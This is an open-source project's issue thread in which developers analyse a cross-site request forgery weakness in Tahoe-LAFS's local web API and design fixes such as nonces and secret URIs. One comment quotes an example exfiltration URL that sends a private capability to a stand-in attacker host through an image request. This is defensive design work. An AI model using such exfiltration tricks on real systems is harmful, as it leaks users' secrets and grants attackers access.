Web API is vulnerable to XSRF attacks. #98

Closed
opened 2007-08-10 21:04:58 +00:00 by nejucomo · 19 comments
nejucomo commented 2007-08-10 21:04:58 +00:00
Owner

the current web-api is susceptible to cross-site reference forgery (XSRF) attacks [1].

An example attack scenario looks like this: The attacker expects the victim to be a Tahoe user and wants to read their harddrive, and knows they have a fetish for nuclear warhead HOWTO / porn mashups.

So they create NudieNukeHOWTOS.com and put an enticing link text with a url target that PUT's the user's root directory to Tahoe.

In order to prevent this kind of attack requires (I believe) that users cannot cut'n'paste URLs into their browser to initiate Tahoe actions. This might explicitly be counter to the design goals. A workaround is to require the users to cut'n'paste into an entry form within the web UI (see below).

One technical solution is for the Web UI and API to associate an unguessable string with each action-triggering URL. These strings are provided to the browser (such as with a hidden input field) or the webapi client (perhaps in a header) and verified before executing actions.

If we want the use case of Alice sending Bob an email that says: "Hey download my great Tahoe photo directory with this URI: ...", we can require Bob to paste this string into an input field in the Web UI instead of the location bar. (Even this might be vulnerable... I'm not sure of the capabilities of javascript and the like...)

References:
[1] http://en.wikipedia.org/wiki/XSRF

the current web-api is susceptible to cross-site reference forgery (XSRF) attacks [1]. An example attack scenario looks like this: The attacker expects the victim to be a Tahoe user and wants to read their harddrive, and knows they have a fetish for nuclear warhead HOWTO / porn mashups. So they create [NudieNuke](wiki/NudieNuke)HOWTOS.com and put an enticing link text with a url target that PUT's the user's root directory to Tahoe. In order to prevent this kind of attack requires (I believe) that users cannot cut'n'paste URLs into their browser to initiate Tahoe actions. This might explicitly be counter to the design goals. A workaround is to require the users to cut'n'paste into an entry form within the web UI (see below). One technical solution is for the Web UI and API to associate an unguessable string with each action-triggering URL. These strings are provided to the browser (such as with a hidden input field) or the webapi client (perhaps in a header) and verified before executing actions. If we want the use case of Alice sending Bob an email that says: "Hey download my great Tahoe photo directory with this URI: ...", we can require Bob to paste this string into an input field in the Web UI *instead* of the location bar. (Even this might be vulnerable... I'm not sure of the capabilities of javascript and the like...) References: [1] <http://en.wikipedia.org/wiki/XSRF>
tahoe-lafs added the
code
minor
defect
0.4.0
labels 2007-08-10 21:04:58 +00:00
tahoe-lafs added this to the undecided milestone 2007-08-10 21:04:58 +00:00
warner commented 2007-08-10 23:09:49 +00:00
Author
Owner

Hm. I believe that browsers can't do PUT or DELETE (only GET and POST), so
this might be a good argument for not having the localfile= argument on those
methods (certainly on GET, since anyone can make you do a GET, but that's why
GET is never supposed to have side effects anyways).

So if GETs are side-effect free, and the javascript same-origin policy
prevents other site's javascript from reading your local data, and browsers
can't do PUT or DELETE, then I think the only attack vectors left are POSTs.

That would mean the attack is my web page which has a form on it with an
action that points at your local tahoe node and does something (like use
localfile= to upload files from your disk into the vdrive somewhere that I
can read them, or perhaps just cause your node to delete your root
directory). This strikes me as a more general problem.. pretty much every
large web site out there has actions that are triggered by form POSTs.. how
do they protect against other sites pointing forms their way? Do browsers
complain if the form you serve doesn't point back at your own site? How do
others deal with this?

Ohh.. but at the moment, the localfile= form of GET does have side-effects,
namely writing to your local disk. So an attacker could easily cause you to
modify your local filesystem. I had thought I'd put in some weak protection
against the most obvious exploits of this (refuse to overwrite existing
files), but in looking through the code, it seems that I'm remembering
incorrectly.

So at the very least, we need to remove the localfile= form of GET.

Hm. I believe that browsers can't do PUT or DELETE (only GET and POST), so this might be a good argument for not having the localfile= argument on those methods (certainly on GET, since anyone can make you do a GET, but that's why GET is never supposed to have side effects anyways). So if GETs are side-effect free, and the javascript same-origin policy prevents other site's javascript from reading your local data, and browsers can't do PUT or DELETE, then I think the only attack vectors left are POSTs. That would mean the attack is my web page which has a form on it with an action that points at your local tahoe node and does something (like use localfile= to upload files from your disk into the vdrive somewhere that I can read them, or perhaps just cause your node to delete your root directory). This strikes me as a more general problem.. pretty much every large web site out there has actions that are triggered by form POSTs.. how do they protect against other sites pointing forms their way? Do browsers complain if the form you serve doesn't point back at your own site? How do others deal with this? Ohh.. but at the moment, the localfile= form of GET *does* have side-effects, namely writing to your local disk. So an attacker could easily cause you to modify your local filesystem. I had thought I'd put in some weak protection against the most obvious exploits of this (refuse to overwrite existing files), but in looking through the code, it seems that I'm remembering incorrectly. So at the very least, we need to remove the localfile= form of GET.
warner commented 2007-08-11 01:56:54 +00:00
Author
Owner

I've disabled the localfile= form of GET and PUT in changeset:42f8e574169b87a7, and you must touch a special file named webport_allow_localfile in the node's basedir to reenable them. (they're awfully useful for testing, so I didn't want to get rid of the feature completely).

So that takes care of any localfile= issues. What's left?

I've disabled the localfile= form of GET and PUT in changeset:42f8e574169b87a7, and you must touch a special file named `webport_allow_localfile` in the node's basedir to reenable them. (they're awfully useful for testing, so I didn't want to get rid of the feature completely). So that takes care of any localfile= issues. What's left?
zooko commented 2007-08-13 17:09:46 +00:00
Author
Owner

I'd like for somebody to review this issue before we release v0.5. Assigning it to Nejucomo.

I'd like for somebody to review this issue before we release v0.5. Assigning it to Nejucomo.
tahoe-lafs modified the milestone from undecided to 0.5.0 2007-08-13 17:09:46 +00:00
tahoe-lafs added
major
and removed
minor
labels 2007-08-13 17:10:13 +00:00
tahoe-lafs added
code-frontend-web
and removed
code
labels 2007-08-14 18:54:07 +00:00
zooko commented 2007-08-15 15:47:14 +00:00
Author
Owner

I think Brian is right that this is a very general problem in web sites/web services. For example if you visit this web page while you are logged into your amazon account, it will add a book to your amazon shopping cart:

http://shiflett.org/amazon.php

The capabilities perspective on XSRF attacks is that they are Confused Deputy Attacks. That is: your client (the web browser) is asking the server (the tahoe node or the amazon web server) to do X, and the web browser has the authority to do X, but the web browser shouldn't have used that authority at that time.

This happens because the authority is "ambient" within the scope of a "session" or a cookie or some other such authorization scope -- whatever requests are made within that scope are made with all of the client's authority.

For example, when amazon receives a request from your web browser to add a book to your shopping cart, it decides whether to honor the request based on whether your web browser is currently "logged in" to amazon. When a tahoe node receives a POST from your web browser to alter your vdrive, the tahoe node decides whether to honor the request based on whether the browser has authenticated (I guess -- I don't understand how or if we currently do authentication). The problem is that the browser is not used solely for that one purpose (amazon shopping or tahoe usage), so if the other purposes for which it is used lead to the user clicking on a link that was influenced by an attacker, this kind of attack can succeed.

A capabilities-inspired solution to this problem would be to make a narrower authorization. For example, below I elaborate on nejucomo's "unguessable string" suggestion:

When the tahoe node starts up, it emits a URL containing an unguessable random string into a file in its dir. The user has to cut and paste that URL into her web browser in order to use the tahoe node. For the duration of this run of the node process, it requires that same unguessable random string to be present in all HTTP requests that it receives. With this scheme, then even if the user uses their web browser for other purposes at the same time as they use it for tahoe, and even if a malicious person gives them a hyperlink that was designed to abuse their tahoe authorities, or even if they load a web page containing javascript like the "amazon.php" attack referenced above, then the malicious person can't cause them to use their tahoe authorities since the malicious person doesn't know the unguessable string.

Is that right so far?

I believe nejucomo has recently studied this topic and he may have a better idea.

I think Brian is right that this is a very general problem in web sites/web services. For example if you visit this web page while you are logged into your amazon account, it will add a book to your amazon shopping cart: <http://shiflett.org/amazon.php> The capabilities perspective on XSRF attacks is that they are Confused Deputy Attacks. That is: your client (the web browser) is asking the server (the tahoe node or the amazon web server) to do X, and the web browser has the authority to do X, but the web browser shouldn't have used that authority at that time. This happens because the authority is "ambient" within the scope of a "session" or a cookie or some other such authorization scope -- whatever requests are made within that scope are made with all of the client's authority. For example, when amazon receives a request from your web browser to add a book to your shopping cart, it decides whether to honor the request based on whether your web browser is currently "logged in" to amazon. When a tahoe node receives a POST from your web browser to alter your vdrive, the tahoe node decides whether to honor the request based on whether the browser has authenticated (I guess -- I don't understand how or if we currently do authentication). The problem is that the browser is not used *solely* for that one purpose (amazon shopping or tahoe usage), so if the other purposes for which it is used lead to the user clicking on a link that was influenced by an attacker, this kind of attack can succeed. A capabilities-inspired solution to this problem would be to make a narrower authorization. For example, below I elaborate on nejucomo's "unguessable string" suggestion: When the tahoe node starts up, it emits a URL containing an unguessable random string into a file in its dir. The user has to cut and paste that URL into her web browser in order to use the tahoe node. For the duration of this run of the node process, it requires that same unguessable random string to be present in all HTTP requests that it receives. With this scheme, then even if the user uses their web browser for other purposes at the same time as they use it for tahoe, and even if a malicious person gives them a hyperlink that was designed to abuse their tahoe authorities, or even if they load a web page containing javascript like the "amazon.php" attack referenced above, then the malicious person can't cause them to use their tahoe authorities since the malicious person doesn't know the unguessable string. Is that right so far? I believe nejucomo has recently studied this topic and he may have a better idea.
zooko commented 2007-08-15 15:48:12 +00:00
Author
Owner

I'm starting to have confidence that the webapi that we have now is good enough/safe enough for v0.5. I still would like for nejucomo to look at it for a few minutes just to see if there is something that could be a serious issue in the short term.

I'm starting to have confidence that the webapi that we have now is good enough/safe enough for v0.5. I still would like for nejucomo to look at it for a few minutes just to see if there is something that could be a serious issue in the short term.
warner commented 2007-08-15 17:21:32 +00:00
Author
Owner

I like the nonce idea. Several people have pointed out that URLs are leaky
(referrer headers, anti-phishing toolbars, etc), but I think having the
authority embedded in the URL is a lot better than having it be ambient in
the browser.

If the nonce is stable over time, then users can bookmark their favorite
sites. If not (if each session generates a new one or something), then if we
want to do password-based authentication on the local system (or maybe even a
remote system, although URLs get a lot leakier when you tell someone else
about them..) then we could arrange for an old nonce to ask for
authentication in some non-ambient-authority-creating way and then bounce you
to the new nonce, i.e. !http://LOCALHOST/NONCE1/path sends you to
!http://LOCALHOST/login?path_when_done=path which asks for a password then
sends you to !http://LOCALHOST/NONCE2/path .

The nonce in this scenario represents authority to access the user's entire
vdrive: that is a good thing and a bad thing. The good thing is that it means
the user can navigate to parent directories and generally get random-access
to their whole vdrive. The bad thing is that they can't safely share web
access to a limited portion of the vdrive (but that's what the "here's the
URI you should share with someone else" link is for).

How about this for a post-0.5.0 release?:

  • we create a persistent nonce the first time the webapi port is used
  • write that to disk in a human-readable format in a well-known file
  • change the welcome page to replace "click here to visit your vdrive" links
    with a small form
    • the form tells you the full pathname to the nonce file, and tells you
      to paste the nonce into this box
    • the form has one button for "visit my personal vdrive" and a second for
      "visit the global vdrive".
    • the code behind the form just redirects you to a URL that has the nonce
      added as a prefix
  • we also change the directory.xhtml page to make the "go back to the
    Welcome Page" link go up one more level, to get over the nonce part of
    the URL

This would deny local vdrive access to the providers of remote pages (those
who do not know the nonce), but still leave an affordance for a local user to
hit a simple (non-random) web page and receive instructions on how to access
their vdrive. I think it makes access to the vdrive equivalent to access to
the node's basedir, which is exactly the correspondence we want.

I like the nonce idea. Several people have pointed out that URLs are leaky (referrer headers, anti-phishing toolbars, etc), but I think having the authority embedded in the URL is a lot better than having it be ambient in the browser. If the nonce is stable over time, then users can bookmark their favorite sites. If not (if each session generates a new one or something), then if we want to do password-based authentication on the local system (or maybe even a remote system, although URLs get a lot leakier when you tell someone else about them..) then we could arrange for an old nonce to ask for authentication in some non-ambient-authority-creating way and then bounce you to the new nonce, i.e. !<http://LOCALHOST/NONCE1/path> sends you to !<http://LOCALHOST/login?path_when_done=path> which asks for a password then sends you to !<http://LOCALHOST/NONCE2/path> . The nonce in this scenario represents authority to access the user's entire vdrive: that is a good thing and a bad thing. The good thing is that it means the user can navigate to parent directories and generally get random-access to their whole vdrive. The bad thing is that they can't safely share web access to a limited portion of the vdrive (but that's what the "here's the URI you should share with someone else" link is for). How about this for a post-0.5.0 release?: * we create a persistent nonce the first time the webapi port is used * write that to disk in a human-readable format in a well-known file * change the welcome page to replace "click here to visit your vdrive" links with a small form * the form tells you the full pathname to the nonce file, and tells you to paste the nonce into this box * the form has one button for "visit my personal vdrive" and a second for "visit the global vdrive". * the code behind the form just redirects you to a URL that has the nonce added as a prefix * we also change the directory.xhtml page to make the "go back to the Welcome Page" link go up one more level, to get over the nonce part of the URL This would deny local vdrive access to the providers of remote pages (those who do not know the nonce), but still leave an affordance for a local user to hit a simple (non-random) web page and receive instructions on how to access their vdrive. I think it makes access to the vdrive equivalent to access to the node's basedir, which is exactly the correspondence we want.
tahoe-lafs modified the milestone from 0.5.0 to 0.6.0 2007-08-15 18:33:27 +00:00
warner commented 2007-08-16 18:38:55 +00:00
Author
Owner

robk mentioned a technique they used back at Yahoo involving "crumbs", and has promised to add a note here with some details.

robk mentioned a technique they used back at Yahoo involving "crumbs", and has promised to add a note here with some details.
nejucomo commented 2007-08-20 19:45:51 +00:00
Author
Owner

I don't see the need for the complicated bootstrapping procedure when using noncey URLs. We may be able to preserve some user-friendliness while preventing XSRF attacks.

For instance, if the user is authenticated with a persistent cookie, we could provide the main top-level page without requiring a nonce. This would be safe as long as loading this page causes no Tahoe operations to be performed. This page would insert the nonce into each link it exposes.

Thus, an XSRF attack could only direct a user to the main page, but could not perform actions. The benefit here is that the user can bookmark the main page, or type it in, or follow a link on an instructional page.

I don't see the need for the complicated bootstrapping procedure when using noncey URLs. We may be able to preserve some user-friendliness while preventing XSRF attacks. For instance, if the user is authenticated with a persistent cookie, we could provide the main top-level page without requiring a nonce. This would be safe as long as loading this page causes no Tahoe operations to be performed. This page would insert the nonce into each link it exposes. Thus, an XSRF attack could only direct a user to the main page, but could not perform actions. The benefit here is that the user can bookmark the main page, or type it in, or follow a link on an instructional page.
zooko commented 2007-08-20 20:56:27 +00:00
Author
Owner

See related issue in ticket #52.

See related issue in ticket #52.
zooko commented 2007-08-21 22:09:34 +00:00
Author
Owner

As per this discussion:

http://allmydata.org/pipermail/tahoe-dev/2007-August/000108.html

I intend to fix this ASAP and build a v0.5.1 release.

As per this discussion: <http://allmydata.org/pipermail/tahoe-dev/2007-August/000108.html> I intend to fix this ASAP and build a v0.5.1 release.
zooko commented 2007-08-21 23:13:05 +00:00
Author
Owner

Brian and I discussed nejucomo's simplification on IRC and we don't get it: couldn't javascript-enabled attackers fetch the welcome page, parse it, and then attack the user's data?

Oh, but non-javascript-enabled attackers couldn't.

Am I right?

Brian and I discussed nejucomo's simplification on IRC and we don't get it: couldn't javascript-enabled attackers fetch the welcome page, parse it, and then attack the user's data? Oh, but non-javascript-enabled attackers couldn't. Am I right?
nejucomo commented 2007-08-22 19:46:12 +00:00
Author
Owner

I'm not aware of a means for Javascript from host Malicious.com to fetch a page from TargetSite.com, parse it, and respond to it. But, I certainly wouldn't be surprised if that were possible. (My knowledge of Javascript and web front-end technologies is limited, but growing because of this issue.)

In the example attack, the only purpose of the Java script is to conceal a POST. The same attack is possible without Javascript, the main difference is that the user must be tricked into clicking a "submit" button. (Who knows, perhaps with CSS or some such, the POST could be concealed without Javascript.) It's important not to be confused about Javascript's role here. It does not "cause" any web requests. It just decorates a normal request to make the nature of the attack more obscure.

Is it possible for an XSRF attack to send a GET request to Tahoe, then redirect from that page to a second attack site which somehow snarfs private Tahoe data? (For example, if the main page is unprotected with a nonce, but has links to protected pages, is it possible to cause the browser to load that page and reveal the secrets to the attacker?)

I don't think this is possible, which leads me to suggest we follow this principal:

XSRF Defence Principal: Any URL which initiates a Tahoe action, or any Tahoe page which causes browser actions without user interaction, must be protected with a shared secret. Any other Tahoe URL may be bare and unprotected with a secret (for user-friendliness).

So for instance, an un-guarded URL should not accept any parameters whatsoever, but may have constrained side-effects (such as generating a new random nonce).

I'm not aware of a means for Javascript from host Malicious.com to fetch a page from [TargetSite](wiki/TargetSite).com, parse it, and respond to it. But, I certainly wouldn't be surprised if that were possible. (My knowledge of Javascript and web front-end technologies is limited, but growing because of this issue.) In the example attack, the only purpose of the Java script is to conceal a POST. The same attack is possible without Javascript, the main difference is that the user must be tricked into clicking a "submit" button. (Who knows, perhaps with CSS or some such, the POST could be concealed without Javascript.) It's important not to be confused about Javascript's role here. It does not "cause" any web requests. It just decorates a normal request to make the nature of the attack more obscure. Is it possible for an XSRF attack to send a GET request to Tahoe, then redirect from that page to a second attack site which somehow snarfs private Tahoe data? (For example, if the main page is unprotected with a nonce, but has links to protected pages, is it possible to cause the browser to load that page and reveal the secrets to the attacker?) I don't *think* this is possible, which leads me to suggest we follow this principal: XSRF Defence Principal: Any URL which initiates a Tahoe action, or any Tahoe page which causes browser actions without user interaction, must be protected with a shared secret. Any *other* Tahoe URL may be bare and unprotected with a secret (for user-friendliness). So for instance, an un-guarded URL should not accept any parameters whatsoever, but may have constrained side-effects (such as generating a new random nonce).
nejucomo commented 2007-08-22 20:10:34 +00:00
Author
Owner

So most secure and least user-friendly solution I imagine is this:

S1. There is one unguarded URL which serves up an authentication page (with a CAPTCHA for good measure).

S2. Whenever any page loads it generates a unique nonce for every Tahoe URL contained in that page.

S3. Tahoe maintains a table of noncey urls and related actions. Each entry is removed after a single use, or after a given timeout. (This mitigates URL leakiness.)

This has several drawbacks: No bookmarks, no human modification of location bar, lot's of repeated authentications.

It sounds like the suggested deviations from this most-secure approach address different drawbacks with trade-offs:

A. Use a single persistent nonce, that is refreshed under certain (which?) conditions. This allows bookmarking and user location modification.

B. Use no authentication whatsoever on the "authentication page" (making it a simple portal). This removes the need for frequent authentication, but may be vulnerable to XSRF.

C. Make all inter-Tahoe UI actions and traversals into POSTS where the nonce is a hidden parameter. This is a user-friendliness feature. (This makes the URL's appear succinct and human readable, and the user or another site may link to a specific action. If the nonce is missing, they are redirected to a login page explaining which action is about to be performed.)

Are there other deviations from the "most secure" approach, or complete alternatives we should consider?

So most secure and least user-friendly solution I imagine is this: S1. There is one unguarded URL which serves up an authentication page (with a CAPTCHA for good measure). S2. Whenever *any* page loads it generates a unique nonce for *every* Tahoe URL contained in that page. S3. Tahoe maintains a table of noncey urls and related actions. Each entry is removed after a single use, or after a given timeout. (This mitigates URL leakiness.) This has several drawbacks: No bookmarks, no human modification of location bar, lot's of repeated authentications. It sounds like the suggested deviations from this most-secure approach address different drawbacks with trade-offs: A. Use a single persistent nonce, that is refreshed under certain (which?) conditions. This allows bookmarking and user location modification. B. Use no authentication whatsoever on the "authentication page" (making it a simple portal). This removes the need for frequent authentication, but may be vulnerable to XSRF. C. Make all inter-Tahoe UI actions and traversals into POSTS where the nonce is a hidden parameter. This is a user-friendliness feature. (This makes the URL's appear succinct and human readable, and the user or another site may link to a specific action. If the nonce is missing, they are redirected to a login page explaining which action is about to be performed.) Are there other deviations from the "most secure" approach, or complete alternatives we should consider?
warner commented 2007-08-23 00:24:06 +00:00
Author
Owner

After chatting with zooko about secrets, I've implemented the following change:

  • remove /vdrive/private from the web API
  • create a "start.html" file in BASEDIR at node startup, containing a brief
    welcome message and links to the following:
    • the welcome page (just a simple http://localhost:8080/ link)
    • the public vdrive (/vdrive/global)
    • the URI-based private vdrive root (/uri/$PRIVATE_URI)

This accomplishes the basic goal: making access to the private vdrive
contingent upon knowing something secret. An attacker who can get control of
the browser via any http-sourced page will be unable to determine learn
$PRIVATE_URI, so they won't be able to access or modify anything through it.
XSRF attacks against /vdrive/global are still possible, but the attacker
could just as easily modify the public vdrive through their own node: they
get no additional abilities by using the victim's node.

The concern with javascript is an XSS thing: the assumption is that a page
served by a "trusted" server will contain content under the control of the
attacker, specifically a piece of javascript that runs in the context of the
"trusted" page. This JS is then able to make HTTP requests (via the usual
XMLHTTPRequest mechanism used for AJAXy stuff) to anything from the same
server, and those requests will be accompanied with any host-specific
authority-bearing cookies.

Plain HTML is a concern as well, as nejucomo's example shows, when the POST
or GET has side-effects. Plain HTML has no way to take the information it has
learned and share it with others, whereas an active attack (javascript) does.

In our case, the XSS attack to be concerned about is one against the
authority contained in the URL, specifically that /uri/$PRIVATE_URI portion.
If an attacker can convince you to attach an .html file to your private
vdrive somewhere and then view it, any javascript in that file gets control.
It can read the current URL, extract the $PRIVATE_URI portion, then reveal
that data to an external server (say, by changing the source= on an embedded
IMG tag to refer to
http://attacker.example.org/0wned.jpg?secret=$PRIVATE_URI).

To mitigate this problem, the next change I'm about to make is to modify the
way that we present certain files in the web directory view to remove the
authority from the URL. In each directory, we present a list of child names
as hyperlinks, either to another directory or to the file attached to that
name. With this change, the hyperlinks for files will point at
/uri/$FILE_URI?t=$FILENAME instead of pointing at .../$FILENAME . The effect
of this will be that the javascript/etc will still run, but there will be
nothing interesting or secret left in the URL that it can usefully reveal.

This addresses another problem, URL leakage through Referrer headers. If the
user follows any hyperlink present on a /uri/$PRIVATE_URI page, that request
will carry the page's URL in the Referrer header, revealing the secret to the
new web server. By insuring that all HTML content renders in a different page
(with no authority in the URL), this problem is fixed.

I'm planning to leave the .../file.html URL working (so that simple 'wget'
operations like /uri/$PRIVATE_URI/subdir/foo.html still work and don't mangle
the downloaded filename). This change will only cause the directory node
navigation page to provide alternative HREFs for children which are files.

After chatting with zooko about secrets, I've implemented the following change: * remove /vdrive/private from the web API * create a "start.html" file in BASEDIR at node startup, containing a brief welcome message and links to the following: * the welcome page (just a simple <http://localhost:8080/> link) * the public vdrive (/vdrive/global) * the URI-based private vdrive root (/uri/$PRIVATE_URI) This accomplishes the basic goal: making access to the private vdrive contingent upon knowing something secret. An attacker who can get control of the browser via any http-sourced page will be unable to determine learn $PRIVATE_URI, so they won't be able to access or modify anything through it. XSRF attacks against /vdrive/global are still possible, but the attacker could just as easily modify the public vdrive through their own node: they get no additional abilities by using the victim's node. The concern with javascript is an XSS thing: the assumption is that a page served by a "trusted" server will contain content under the control of the attacker, specifically a piece of javascript that runs in the context of the "trusted" page. This JS is then able to make HTTP requests (via the usual XMLHTTPRequest mechanism used for AJAXy stuff) to anything from the same server, and those requests will be accompanied with any host-specific authority-bearing cookies. Plain HTML is a concern as well, as nejucomo's example shows, when the POST or GET has side-effects. Plain HTML has no way to take the information it has learned and share it with others, whereas an active attack (javascript) does. In our case, the XSS attack to be concerned about is one against the authority contained in the URL, specifically that /uri/$PRIVATE_URI portion. If an attacker can convince you to attach an .html file to your private vdrive somewhere and then view it, any javascript in that file gets control. It can read the current URL, extract the $PRIVATE_URI portion, then reveal that data to an external server (say, by changing the source= on an embedded IMG tag to refer to <http://attacker.example.org/0wned.jpg?secret=$PRIVATE_URI>). To mitigate this problem, the next change I'm about to make is to modify the way that we present certain files in the web directory view to remove the authority from the URL. In each directory, we present a list of child names as hyperlinks, either to another directory or to the file attached to that name. With this change, the hyperlinks for files will point at /uri/$FILE_URI?t=$FILENAME instead of pointing at .../$FILENAME . The effect of this will be that the javascript/etc will still run, but there will be nothing interesting or secret left in the URL that it can usefully reveal. This addresses another problem, URL leakage through Referrer headers. If the user follows any hyperlink present on a /uri/$PRIVATE_URI page, that request will carry the page's URL in the Referrer header, revealing the secret to the new web server. By insuring that all HTML content renders in a different page (with no authority in the URL), this problem is fixed. I'm planning to leave the .../file.html URL working (so that simple 'wget' operations like /uri/$PRIVATE_URI/subdir/foo.html still work and don't mangle the downloaded filename). This change will only cause the directory node navigation page to provide alternative HREFs for children which are files.
warner commented 2007-08-23 00:41:43 +00:00
Author
Owner

I've just pushed the second change I mentioned earlier, to present /uri
-based urls for all files in the vdrive.

It could use some improvement, though, in particular I'm displeased that the
URL you can cut-and-paste out of the HTML page ends in a big ugly hex string,
such that when you pass it to 'wget', you get a file on disk with a useless
big name.

I think I want to implement a URL which contains the tahoe file URI as the
second-to-last component, but then contains the desired filename as the last
component, like <http://localhost:8080/uri/$URI/foo.jpg> . The server
would deliver the same file no matter what name you tack on the end, but this
way tools like wget could use a sensible name instead of $URI.

Our present webapi doesn't accomodate this, though, since the /uri/$URI/ form
can refer to directories too, in which case /uri/$URI/foo.jpg really means to
look inside the directory referenced by $URI for a child named foo.jpg and
serve that. So we need a new URL space, maybe /download or /download-uri
or /uri-file or something.

I've just pushed the second change I mentioned earlier, to present /uri -based urls for all files in the vdrive. It could use some improvement, though, in particular I'm displeased that the URL you can cut-and-paste out of the HTML page ends in a big ugly hex string, such that when you pass it to 'wget', you get a file on disk with a useless big name. I think I want to implement a URL which contains the tahoe file URI as the second-to-last component, but then contains the desired filename as the last component, like `<http://localhost:8080/uri/$URI/foo.jpg>` . The server would deliver the same file no matter what name you tack on the end, but this way tools like wget could use a sensible name instead of $URI. Our present webapi doesn't accomodate this, though, since the /uri/$URI/ form can refer to directories too, in which case /uri/$URI/foo.jpg really means to look inside the directory referenced by $URI for a child named foo.jpg and serve *that*. So we need a new URL space, maybe /download or /download-uri or /uri-file or something.
tahoe-lafs modified the milestone from 0.6.0 to 0.5.1 2007-08-23 00:42:38 +00:00
warner commented 2007-08-30 23:33:33 +00:00
Author
Owner

We released 0.5.1 a week ago. Are we happy enough with the fixes therein to close this ticket? I'd like to mark the trac 0.5.1 milestone as done, but this is the last ticket remaining.

We released 0.5.1 a week ago. Are we happy enough with the fixes therein to close this ticket? I'd like to mark the trac 0.5.1 milestone as done, but this is the last ticket remaining.
zooko commented 2007-09-23 14:17:09 +00:00
Author
Owner

Whoops, I forgot to mark this as fixed in the v0.5.1 release.

I wish trac would send me e-mail. I suspect that my habit of "checking the TimeLine for new stuff" isn't good enough to notice all the trac events that I want to notice.

Whoops, I forgot to mark this as fixed in the v0.5.1 release. I wish trac would send me e-mail. I suspect that my habit of "checking the [TimeLine](wiki/TimeLine) for new stuff" isn't good enough to notice all the trac events that I want to notice.
tahoe-lafs added the
fixed
label 2007-09-23 14:17:09 +00:00
zooko closed this issue 2007-09-23 14:17:09 +00:00
davidsarah commented 2009-10-28 03:51:46 +00:00
Author
Owner

Note that JavaScript in a given file can still obtain the read URI for that file. In the case of a mutable file, this is more than least authority because it allows reading future versions. I will open a new bug about that.

Note that [JavaScript](wiki/JavaScript) in a given file can still obtain the read URI for that file. In the case of a mutable file, this is more than least authority because it allows reading future versions. I will open a new bug about that.
davidsarah commented 2009-10-28 04:04:29 +00:00
Author
Owner

New bug is #821.

New bug is #821.
Sign in to join this conversation.
No milestone
No project
No assignees
1 participant
Notifications
Due date
The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference: tahoe-lafs/trac-2024-07-25#98
No description provided.